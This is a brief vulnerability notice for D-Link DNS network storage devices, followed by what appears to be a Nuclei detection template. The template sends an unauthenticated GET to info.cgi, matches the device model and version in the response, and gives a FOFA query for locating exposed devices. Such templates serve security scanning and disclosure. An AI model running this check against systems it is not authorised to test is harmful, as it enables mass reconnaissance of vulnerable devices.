A vulnerability has been identified in the D-Link DNS series network storage devices, allowing for the exposure of sensitive device information to unauthorized actors. This vulnerability is due to an unauthenticated access flaw in the info.cgi script, which can be exploited via a simple HTTP GET request, affecting over 920,000 devices on the Internet.
PoC代码[已公开]
id: dlink-unauth-cgi-script
info:
name: D-Link DNS Series CGI Script - Unauthenticated
author: pussycat0x
severity: low
description: |
A vulnerability has been identified in the D-Link DNS series network storage devices, allowing for the exposure of sensitive device information to unauthorized actors. This vulnerability is due to an unauthenticated access flaw in the info.cgi script, which can be exploited via a simple HTTP GET request, affecting over 920,000 devices on the Internet.
reference:
- https://github.com/netsecfish/info_cgi
classification:
cpe: cpe:2.3:h:dlink:dns-345:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: dlink
product: dns-345
fofa-query: "app=\"D_Link-DNS\""
tags: unauth,dlink,misconfig,vuln
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/info.cgi"
matchers-condition: and
matchers:
- type: word
words:
- "Product="
- "Version="
- "Model="
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502201f77a79904b3fb46986096bf50e2b128d41e4566a7ee7b5c2c1173d1bb075bb5022100c1932521754d9a0857d488e72449dcbe6d34ff6fa2afc42bcff4c2a9a920f3b2:922c64590222798bb761d5b6d8e72950